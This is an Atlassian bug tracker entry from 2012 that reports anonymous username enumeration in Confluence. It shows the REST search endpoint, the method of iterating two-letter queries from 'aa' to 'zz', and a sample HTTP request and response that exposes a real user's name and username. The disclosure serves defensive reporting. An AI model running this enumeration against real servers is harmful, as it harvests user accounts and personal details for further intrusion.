The vulnerability exists in the standalone and also in the online demonstration enviroment.

2012-04-24T13:41:00
ID ATLASSIAN:CONFSERVER-25322
Type atlassian
Reporter sruwhof
Modified 2018-10-11T08:37:32

Description

It is possible to anonymously enumerate all usernames via the script at /rest/prototype/1/search/user.json?max-results=10&query=XX. The 'query' GET parameter should contain at least two charakters. It is possible to enumerate all usernames by performing a search from 'query' value 'aa' to 'zz'.


When the following GET request is made: {noformat} GET /rest/prototype/1/search/user.json?max-results=10&query=si HTTP/1.1 Host: confluence.atlassian.com {noformat} The following answer is given: {noformat} HTTP/1.1 200 OK Date: Tue, 24 Apr 2012 13:32:11 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: application/json Keep-Alive: timeout=3, max=20 Connection: Keep-Alive Content-Length: 11707

{"totalSize":846,"result":[{"id":"254738536","type":"user","title":"Harshil Singhal","wikiLink":"[~hs39867]","createdDate":{"friendly":"Aug 22, 2011","date":"2011-08-22T21:52:45-0500"},"creator":{"links":[{"href":"https://confluence.atlassian.com/rest/prototype/1/user/system/anonymous","rel":"self"}],"avatarUrl":"/s/en_GB/3277/16//images/icons/profilepics/anonymous.png","anonymous":true,"displayName":"Anonymous"},"lastModifier":{"links":[{"href":"https://confluence.atlassian.com/rest/prototype/1/user/system/anonymous","rel":"self"}],"avatarUrl":"/s/en_GB/3277/16//images/icons/profilepics/anonymous.png","anonymous":true,"displayName":"Anonymous"},"username":"hs39867","thumbnailLink": [..]{noformat}